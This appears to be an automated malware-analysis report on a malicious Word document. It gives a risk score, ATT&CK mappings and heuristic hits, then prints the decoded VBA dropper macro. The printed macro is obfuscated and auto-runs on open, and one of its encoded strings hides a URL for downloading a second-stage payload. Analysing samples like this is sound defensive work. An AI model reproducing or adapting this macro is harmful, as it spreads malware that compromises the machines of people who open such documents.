MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is an Office document containing a Document_Open VBA macro, which is a common technique for executing malicious code upon opening. The macro utilizes CreateObject and CallByName, indicating it's designed to run arbitrary code. ClamAV detection as 'Doc.Dropper.Donoff-5743527-0' further supports its malicious nature as a dropper. The obfuscated VBA code strongly suggests it's intended to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19815 bytes |
SHA-256: 2a8346f40036af636fc89bd101df120d4135cd41a2dd40861cba2a7a40f3c096 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub epJGWrVDyTB(ByVal QSGaEafv As String, ByVal Opzmn As Integer)
YDrtr True, "yeTrih8rs3csiQgxv8Fp77ao7VSxr", 9044
NWsIBief "Xwz0PICvru7cQTvIRj3d4", "jNu5QvcbuuyLLSr0KgGSpwi"
gbRldGybWWVadq
DzCvDuoDDX = 6741
If JLvtbWFBp("9Mk0EcZ4Yh1fAqbaX", 886, 440) Then
tgNXLidb = 9024
vMWgGfRhvotm
SnmudJWeMit 1883
wyZbwLPtmC = 3192
bFoveeOx "gN80pZE2nhtXRxTFMyPZwOJg"
GUKmAiVQabCBd = "VnXApT57vSkNBJbe6l28663lGwX"
Else
IehNuzMIjMAAPJ 653, 5024, 4694
dstGNHtPluXtI "LDXBdXGFAOwBzWj2mwpwBuLYB", 9258
owUftD
tdxjbFNHWiIn = False
End If
End Sub
Private Sub vzVkKI(ByVal bQzXoNUXwBmtOO As Integer)
xbWqd "Bz29aJ7NZbYNGegZ8h3S2JBPsb", "jYzMqCSU1uxgbd7ppf57JZFle", "A9JrcPw77wB8mnwPhaD5ubci1"
dmFpLzjeR = 358
XkWqYjImb
dcYhscmtXnJ = "YRWl1CE59TQmQReLi7QQULakg2bvl"
If gFIdyxM(True, 55, True) Then
ojqaDMl = 4069
AesGzyWlxJp 555, "0xkdwhhEJhM5nJT2x", 2131
BqXjITqzJYFobN = "1oaaj4d5O2NK7IbDAHg6e"
dwfqEjcCR
Else
szxfJdmqjH
xqEdEYl 9355
fkhRWncUUBHAD = "q7RP3WRTnufEt1Ac8paf5yCWLM"
End If
End Sub
Private Sub Document_Open()
Dim igHVxKXufXsXO As Integer
Dim mhFFtvxFrRwLPm As Boolean
GapfNL.uRiiQVqZV
End Sub
Attribute VB_Name = "GapfNL"
Private Sub gkvvfTPdSqSX(ByVal EzfhrARrt As String, ByVal artlBzr As String)
ebXztwddWF "1LTjREkhJUaKSQErKK8SUfRCQM"
WjKgZqsQWJEc = "g3Do9caFGW9DKiKBi"
kOFQVpWTVFVHJz "DloCNUsnMuXineIVoSaz0SCaxPE9OCW", "0KESsAsLqQjTAUL5pg59k5YZwHhJ", True
End Sub
Private Sub ITIPk(ByVal AGwXdWmeVIJw As Integer, ByVal ShpwZop As String)
PTHXmkZB 3110
veVvFoZTnn = 6371
QOQPDzLrv "lq7jYkNJ1ujuedV1S03w64xFuT", "ntcIODkZDbhznEtFXhg2Jy"
PKZCPvv = True
xkrJpjUXBTlLpW
End Sub
Private Sub GaCvpctNFOFyCl(ByVal naDTIem As String, ByVal tgiOHxnYV As Boolean)
pvzFf
zxQChqKsOGtGaV
fLbOSAujnh
End Sub
Public Function nYGzMCllQK(ByVal qvQcS As String, ByVal pjpVxyInHnqQH As String) As Object
Dim ftoNhmmDfr As Integer
Dim gpuKQIioACSCn As String
Set nYGzMCllQK = DDwovmDKECrJ(CreateObject(qvQcS))
End Function
Public Sub uRiiQVqZV()
Dim sHdMwNDxXjqdPH As String
Dim SpeZzKPlbrZ As Integer
On Error GoTo Kjkkrk
VowGcTWuifmiOW.iybyWiOTcZ
VowGcTWuifmiOW.QFbEYL
jsgKbBNvZD
Exit Sub
Kjkkrk:
End Sub
Private Sub OKsFsDPg(ByVal PBQmrkOTuW As String)
hixmeDkkqwaFk = "DdSBvnZFv7fu1At8s"
If ADOPV Then
dIGeyCnULFM False, "1DX6vhUUoDl1MQG5EteG"
pRrXYv
fydHBNMFROoRC True
Else
kJqGmTBVPNa 2123
End If
FrsbWgCy "qvYrfz0j3wuW4LroT5NsIZYe7sECm", 972
End Sub
Private Function DDwovmDKECrJ(ByVal ZBFRRddu As Object) As Object
Dim uBVhZqxc As Integer
Set DDwovmDKECrJ = ZBFRRddu
End Function
Private Sub aRgRYrAlXyw(ByVal DpeWnyt As String, ByVal vpdNm As String, ByVal wUzQXDibsm As String)
Set HDlTjvnvSxpIk = IjHPBFHSuduNmQ.qgOQwcBN(True, wUzQXDibsm)
IjHPBFHSuduNmQ.JQhQLLb OYfIcwvfuBIK, 2670, "nGsMllSEBDjvT19LFGtw40b", HDlTjvnvSxpIk
fIIvqJDCRrklu.FTOGRItoOT ZzHrrJDZaCkKE.ZGhRXPCowqRD(KhsGGIcFYWEzx, HDlTjvnvSxpIk, 8879), False, "j9DNGWLSDMKsPzFCee6Uvm48TOl4", DpeWnyt
End Sub
Private Sub jsgKbBNvZD()
Dim uBiDmyERxKkLGs As Boolean
aRgRYrAlXyw fIIvqJDCRrklu.QMehdJSjK, "W89SE8d4WGI4y3kRw", wXfhZLx
fIIvqJDCRrklu.TvbBkXFDqu False, 618, fIIvqJDCRrklu.QMehdJSjK
End Sub
Private Function OYfIcwvfuBIK() As String
OYfIcwvfuBIK = CBoRIUgKyYNZh.QKgpgOuYaZui("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function KhsGGIcFYWEzx() As String
KhsGGIcFYWEzx = CBoRIUgKyYNZh.QKgpgOuYaZui("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function wXfhZLx() As String
wXfhZLx = CBoRIUgKyYNZh.QKgpgOuYaZui("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function
Attribute VB_Name = "CBoRIUgKyYNZh"
Private Function bdbWCHX(ByVal FAzFKR As Integer, ByVal NRcIUIWVOTKiA As Integer, ByVal GjddEQZWEAGQ As String, B
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.